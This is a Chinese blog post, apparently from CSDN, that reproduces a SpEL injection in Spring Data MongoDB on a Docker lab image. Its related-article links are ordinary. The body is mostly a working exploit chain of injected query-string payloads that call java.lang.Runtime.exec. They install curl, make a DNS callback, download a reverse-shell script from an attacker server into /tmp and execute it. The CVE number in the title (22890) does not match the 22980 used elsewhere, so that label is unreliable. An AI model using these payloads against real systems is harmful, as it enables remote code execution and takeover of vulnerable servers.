Spring Data MongoDB SpEL表达式注入漏洞(CVE-2022-22890)

已于 2022-06-27 17:09:44 修改
阅读量7.5k 收藏
点赞数
分类专栏: 漏洞复现 文章标签: spring 安全 web安全
于 2022-06-27 17:08:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45495060/article/details/125487557
版权

漏洞概述

Spring Data MongoDB 应用程序在使用带有 SpEL 表达式的 @Query 或 @Aggregation-annotated 查询方法时容易受到 SpEL 注入的影响,如果输入未经过过滤,则该表达式包含用于值绑定的查询参数占位符。

影响版本

  • v3.4.0

  • v3.3.0 to v3.3.4

漏洞复现

1.环境搭建

docker pull vulfocus/spring-data-mongo-cve_2022_22890:latest

启动环境可以看到如下界面

docker run -itd -p 8090:8080 vulfocus/spring-data-mongo-cve_2022_22890

2、环境中默认是没有crul工具,通过命令下载一个curl工具

http://127.0.0.1:8090/?name=T(java.lang.String).forName(%27java.lang.Runtime%27).getRuntime().exec(%27apt-get install -y curl%27) 

这里尝试DNslog可以看到成功回显

http://127.0.0.1:8090/?name=T(java.lang.String).forName(%27java.lang.Runtime%27).getRuntime().exec(%27crul wjyim8.dnslog.cn%27)

在自己服务器上写一个反弹shell脚本,并开启服务

 下载文件到tmp目录下

http://127.0.0.1:8090/?name=T(java.lang.String).forName(%27java.lang.Runtime%27).getRuntime().exec(%27curl%20-o%20/tmp/1.sh%20http://ip:port/1.sh%27)

服务开启监听,并执行该脚本可以发现反弹成功

http://127.0.0.1:8090/?name=T(java.lang.String).forName(%27java.lang.Runtime%27).getRuntime().exec(%27bash%20/tmp/1.sh%27)

修复建议 

升级到最新版本

一笼管汤包
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CVE-2022-22980 SpringData MongoDB SpEL表达式注入
qq_32445755的博客
11-13 805
SpringData是为了提供一个常见的、一致的数据访问模型,也就是说,它的目标就是为了能为所有数据库(包括关系型和非关系型)提供一致的数据操作接口,并且这些接口名非常通俗易懂,让人一看便知。它也是基于Spring框架的,即可以直接使用Spring的IoC和AOP等特性。
Spring Data MongoDB API(Spring Data MongoDB 开发文档).CHM
08-31
Spring Data MongoDB API。 Spring Data MongoDB 开发文档。
CVE-2022-30190(follina):Microsoft诊断工具(MSDT)远程代码执行漏洞复现(超级详细)
aihiglh的博客
06-15 3522
CVE-2022-30190的复现与使用,由一位中学生独自编写(第一次写文章),干货较多,欢迎收藏和讨论交流
CVE-2022-30190复现及原理
摔不死的笨鸟的博客
06-01 1710
CVE-2022-30190漏洞复现
【CTF】【cve_2022_22890Spring Data MongoDB SpEL表达式注入漏洞
菜菜的成长
02-08 485
cve_2022_22890漏洞应用 学习下反弹shell
WebLogic 反序列化漏洞(CVE-2019-2890)
午夜安全
10-20 3222
WebLogic 反序列化漏洞(CVE-2019-2890) 漏洞描述 2019年10月15日,Oracle官方发布了2019年10月安全更新公告,其中包含了一个可造成RCE远程任意代码执行的高危漏洞漏洞编号为CVE-2019-2890。 Weblogic在利用T3协议进行远程资源加载调用时,默认会进行黑名单过滤以保证反序列化安全。本漏洞绕过了Weblogic的反序列化黑名单,使攻击者可以...
CVE-2022-30190分析以及复现和POC利用 //Microsoft Office MSDT 远程代码执行漏洞
Ba1_Ma0的博客
06-09 9238
在微软官方的介绍里,是从 Word 等调用应用程序使用 URL 协议调用 MSDT 时存在远程执行代码漏洞。成功利用此漏洞的攻击者可以使用调用应用程序的权限运行任意代码。意思是恶意 Word 文档可以使用远程模板功能从远程服务器获取 HTML 文件,并且 HTML 代码可以使用 Microsoft 的 MS-MSDT URI 协议方案来加载其他代码并执行 PowerShell 代码与其他的漏洞不同,要利用此漏洞,攻击者只需要用户打开恶意文档即可,保存为RTF文件后,用户只是预览恶意文件,不用单击或者双击恶意
漏洞预警|Spring Data MongoDB SpEL表达式注入漏洞
LJQClqjc的博客
06-30 515
近日网上有关于开源项目Spring Data MongoDB 存在SpEL表达式注入的信息,棱镜七彩安全研究院对漏洞进行了POC验证。
Apache Subversion Use-After-Free漏洞CVE-2022-24070)
murphysec的博客
04-19 578
CVE-2022-24070漏洞会造成Apache Subversion下处理请求的 HTTPD 工作进程崩溃,进而导致拒绝服务,目前该漏洞已修复,建议受影响用户更新到安全版本,或下载官方补丁:https://subversion.apache.org/security/CVE-2022-24070-advisory.txt 编号       CVE-2022-24070                      标题 Apache Subversion Use-After-Free漏洞
关于Spring Data MongoDB SpEL表达式注入漏洞CVE-2022-22980)的预警提示
Gblfy_Blog
11-05 714
注入漏洞
『Java CVECVE-2022-22980: Spring Data MongoDB SpEL 注入
Ho1aAs‘s Blog
08-09 1152
# 影响版本 Spring Data MongoDB: 3.3.0-3.3.4、3.4.0 # 漏洞原理 使用@Query或@Aggregation注解进行查询时,通过占位符获取输入参数可能会触发SpEL表达式解析
spring-data-mongodb-3.1.8.jar中文-英文对照文档.zip
03-11
注:下文中的 *** 代表文件名中的组件名称。 # 包含: 中文-英文对照文档:【***-javadoc-API文档-中文(简体)-英语-对照版.zip】 jar包下载地址:【***.jar下载地址(官方地址+国内镜像地址).txt】 ...
Spring-data-mongodb_1.9.4_API_docs
11-04
Spring-data-mongodb_1.9.4_API_docs
java-spring-boot-mongodb-starter:MongoDB博客文章:带有Java,Spring Boot和MongoDB的REST API
02-06
您将需要在application.properties文件中更新默认的MongoDB URI spring.data.mongodb.uri 。 指令 使用mvn spring-boot:run在控制台中启动服务器。 如果添加一些单元测试,则可以使用mvn clean test来启动它们。 ...
spring-data-mongodb-reference-docs-1.9.4
11-04
spring-data-mongodb-referrence-docs-1.9.4
CVE-2022-30190 漏洞复现
weixin_53884648的博客
11-10 5110
通过exp实现了对微软目前存在的office-word-2016的成功复现
CVE-2023–22809漏洞利用|复现
Musda的博客
06-22 629
首先需要检查sudoedit版本此漏洞的利用范围仅限于。
Apache Jena XXE漏洞CVE-2022-28890)
murphysec的博客
05-06 1169
CVE-2022-28890漏洞是由于4.5.0 版本之前的 jena-core 没有对 XML 外部实体引用做限制,攻击者可利用恶意的 xml 文件实现读取任意文件。该漏洞影响范围小,建议受影响用户尽快升级到 4.5.0 版本。 编号      CVE-2022-28890 标题 Apache Jena XXE漏洞 描述 Apache Jena 是一个免费的开源Java框架,用于构建语义Web和链接数据应用程序。在4.5.0版本之前的 Apache Jena 中,攻击者可以通过引用 X
SpringBoot集成腾讯COS流程
最新发布
weixin_67727883的博客
05-30 280
SpringBoot集成腾讯COS流程
mongodb修改添加data<2022-10-01为条件的数据
04-25
好的,您想要查询并修改或添加符合条件data<2022-10-01的数据对吗?如果是这样的话,您可以使用MongoDB的update()或updateOne()方法来实现。下面是一个示例代码: db.collection.update( { data: { $lt: new Date("2022-10-01") } }, { $set: { field1: "value1", field2: "value2" } }, { multi: true } ) 这个代码将会修改所有data值小于2022-10-01的数据,将field1和field2的值分别设为"valu1"和"value2"。请注意,使用multi:true选项可以修改所有符合条件的记录。如果您只想修改一条记录,可以使用updateOne()方法。 希望这个回答能够帮到您。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值